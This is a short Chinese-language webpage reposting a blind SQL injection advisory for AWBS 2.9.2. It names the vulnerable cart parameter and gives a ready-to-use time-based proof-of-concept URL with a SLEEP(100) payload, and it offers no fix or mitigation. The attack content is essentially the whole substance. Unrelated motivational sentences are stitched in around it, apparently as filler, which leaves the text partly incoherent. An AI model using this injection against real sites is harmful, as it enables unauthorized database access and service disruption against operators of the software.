AWBS 2.9.2 Blind SQL 注入0day

凡事量力而行,才会恰到好处;自不量力,就会得不偿失。原因何在?当你尝受过失败的时候你会发现,自己不努力会一无所获!长的人生,其实只是瞬间,一定学着,让自己在人生途中,不后悔。

  影响版本:AWBS 2.9.2

  官方网站:http://www.awbs.com

  漏洞类型:SQL注入

  漏洞描述:

  ---Vulnerability---

  http(s)://[HOST]/cart?ca=add_other&oid=[TRUE VALUE]'[BLIND-SQL]

  =============================================================================================

  ---PoC Using Time-Based Blind SQL Injection---

  https://www.vulnerablehost.com/cart?ca=add_other&oid=1'%20AND%20SLEEP(100)='

 

到此这篇关于AWBS 2.9.2 Blind SQL 注入0day就介绍到这了。五官刺激,不是真正的享受。内在安祥,才是下手之处。更多相关AWBS 2.9.2 Blind SQL 注入0day内容请查看相关栏目,小编编辑不易,再次感谢大家的支持!

您可能有感兴趣的文章
中关村在线博客子站SQL注入及修复方案

管家婆软件官方网存在SQL注射及弱口令的漏洞分析

傲游浏览器官网存在SQL注射漏洞分析

Mysql身份认证漏洞的分析以及如何利用

金山毒霸多个sql注入及XSS漏洞和修复